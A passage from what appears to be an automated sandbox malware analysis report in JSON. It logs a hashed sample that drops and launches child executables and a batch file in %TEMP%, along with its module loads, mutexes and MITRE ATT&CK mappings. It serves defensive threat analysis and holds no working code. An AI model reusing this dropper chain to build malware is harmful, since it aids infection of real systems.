directory", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005920)\n \"bauqs.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004108)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\bauqs.exe\"\" - (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00005920)\n \"bauqs.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\xyzuqi.exe\" OK\" - (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\muniw.exe\"\" - (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00004108)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e20000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"KERNEL32\" at base 77320000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69640000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"KERNEL32.DLL\" at base 77320000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"OLE32.DLL\" at base 77400000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a10000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74920000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"ADVAPI32.DLL\" at base 778b0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"PROPSYS.DLL\" at base 745b0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"COMCTL32.DLL\" at base 74a10000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"OLEAUT32.DLL\" at base 76210000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"SHELL32.DLL\" at base 762b0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"CLBCATQ.DLL\" at base 77290000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745b0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"NTMARTA.DLL\" at base 74f80000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76050000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"PROFAPI.DLL\" at base 75b20000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"APPHELP.DLL\" at base 759c0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6c9a0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 762b0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77320000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"SETUPAPI.DLL\" at base 75e50000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"RPCRT4.DLL\" at base 76090000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75b80000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76f00000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"SECUR32.DLL\" at base 75850000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75b40000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f8d0000\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759c0000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74920000\n \"bauqs.exe\" loaded module \"DWMAPI.DLL\" at base 746d0000\n \"bauqs.exe\" loaded module \"ADVAPI32.DLL\" at base 778b0000\n \"bauqs.exe\" loaded module \"KERNEL32.DLL\" at base 77320000\n \"bauqs.exe\" loaded module \"OLE32.DLL\" at base 77400000\n \"bauqs.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a10000\n \"bauqs.exe\" loaded module \"PROPSYS.DLL\" at base 745b0000\n \"bauqs.exe\" loaded module \"COMCTL32.DLL\" at base 74a10000\n \"bauqs.exe\" loaded module \"OLEAUT32.DLL\" at base 76210000\n \"bauqs.exe\" loaded module \"SHELL32.DLL\" at base 762b0000\n \"bauqs.exe\" loaded module \"CLBCATQ.DLL\" at base 77290000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745b0000\n \"bauqs.exe\" loaded module \"NTMARTA.DLL\" at base 74f80000\n \"bauqs.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76050000\n \"bauqs.exe\" loaded module \"PROFAPI.DLL\" at base 75b20000\n \"bauqs.exe\" loaded module \"APPHELP.DLL\" at base 759c0000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6c9a0000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 762b0000\n \"bauqs.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77320000\n \"bauqs.exe\" loaded module \"SETUPAPI.DLL\" at base 75e50000\n \"bauqs.exe\" loaded module \"RPCRT4.DLL\" at base 76090000\n \"bauqs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75b80000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76f00000\n \"bauqs.exe\" loaded module \"SECUR32.DLL\" at base 75850000\n \"bauqs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75b40000\n \"bauqs.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f8d0000\n \"bauqs.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759c0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e20000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77320000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 778b0000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72e20000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xyzuqi.exe\" loaded module \"KERNEL32\" at base 77320000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74920000\n \"xyzuqi.exe\" loaded module \"DWMAPI.DLL\" at base 746d0000\n \"xyzuqi.exe\" loaded module \"ADVAPI32.DLL\" at base 778b0000\n \"xyzuqi.exe\" loaded module \"KERNEL32.DLL\" at base 77320000\n \"xyzuqi.exe\" loaded module \"DHCPCSVC.DLL\" at base 73ca0000\n \"xyzuqi.exe\" loaded module \"IPHLPAPI.DLL\" at base 73e70000\n \"xyzuqi.exe\" loaded module \"RPCRT4.DLL\" at base 76090000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 74120000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 702a0000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76050000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 70280000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 754e0000\n \"xyzuqi.exe\" loaded module \"DNSAPI.DLL\" at base 753a0000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 70270000\n \"xyzuqi.exe\" loaded module \"WS2_32.DLL\" at base 77560000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 75040000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73da0000\n \"xyzuqi.exe\" loaded module \"RASADHLP.DLL\" at base 70190000\n \"xyzuqi.exe\" loaded module \"OLE32.DLL\" at base 77400000\n \"xyzuqi.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a10000\n \"xyzuqi.exe\" loaded module \"PROPSYS.DLL\" at base 745b0000\n \"xyzuqi.exe\" loaded module \"COMCTL32.DLL\" at base 74a10000\n \"xyzuqi.exe\" loaded module \"OLEAUT32.DLL\" at base 76210000\n \"xyzuqi.exe\" loaded module \"SHELL32.DLL\" at base 762b0000\n \"xyzuqi.exe\" loaded module \"CLBCATQ.DLL\" at base 77290000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745b0000\n \"xyzuqi.exe\" loaded module \"NTMARTA.DLL\" at base 74f80000\n \"xyzuqi.exe\" loaded module \"PROFAPI.DLL\" at base 75b20000\n \"xyzuqi.exe\" loaded module \"APPHELP.DLL\" at base 759c0000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6c9a0000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 762b0000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77320000\n \"xyzuqi.exe\" loaded module \"SETUPAPI.DLL\" at base 75e50000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75b80000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76f00000\n \"xyzuqi.exe\" loaded module \"SECUR32.DLL\" at base 75850000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75b40000\n \"xyzuqi.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f8d0000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759c0000\n \"muniw.exe\" loaded module \"KERNEL32.DLL\" at base 77320000\n \"muniw.exe\" loaded module \"ADVAPI32.DLL\" at base 778b0000\n \"muniw.exe\" loaded module \"COMCTL32.DLL\" at base 74a10000\n \"muniw.exe\" loaded module \"COMDLG32.DLL\" at base 77060000\n \"muniw.exe\" loaded module \"GDI32.DLL\" at base 77d70000\n \"muniw.exe\" loaded module \"MSIMG32.DLL\" at base 6f3c0000\n \"muniw.exe\" loaded module \"OLE32.DLL\" at base 77400000\n \"muniw.exe\" loaded module \"OLEAUT32.DLL\" at base 76210000\n \"muniw.exe\" loaded module \"SHELL32.DLL\" at base 762b0000\n \"muniw.exe\" loaded module \"USER32.DLL\" at base 777e0000\n \"muniw.exe\" loaded module \"VERSION.DLL\" at base 74fb0000\n \"muniw.exe\" loaded module \"WINSPOOL.DRV\" at base 6fdf0000\n \"muniw.exe\" loaded module \"IMM32.DLL\" at base 76070000\n \"muniw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74920000\n \"muniw.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a10000\n \"muniw.exe\" loaded module \"DWMAPI.DLL\" at base 746d0000\n \"muniw.exe\" loaded module \"UXTHEME.DLL\" at base 74920000\n \"muniw.exe\" loaded module \"COMCTL32\" at base 74a10000\n \"muniw.exe\" loaded module \"RICHED20.DLL\" at base 69620000\n \"muniw.exe\" loaded module \"WS2_32.DLL\" at base 77560000\n \"muniw.exe\" loaded module \"FWPUCLNT.DLL\" at base 73da0000\n \"muniw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 77400000\n \"muniw.exe\" loaded module \"CLBCATQ.DLL\" at base 77290000\n \"muniw.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76140000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00005920)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005756)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005740)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005740)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005740)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005740)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005740)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00004108)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter comdlg32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter msimg32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter winspool.drv (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter RICHED20.DLL (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter WS2_32.DLL (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter Fwpuclnt.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xyzuqi.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xyzuqi.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"bauqs.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"xyzuqi.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000\n \"muniw.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76090000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" touched 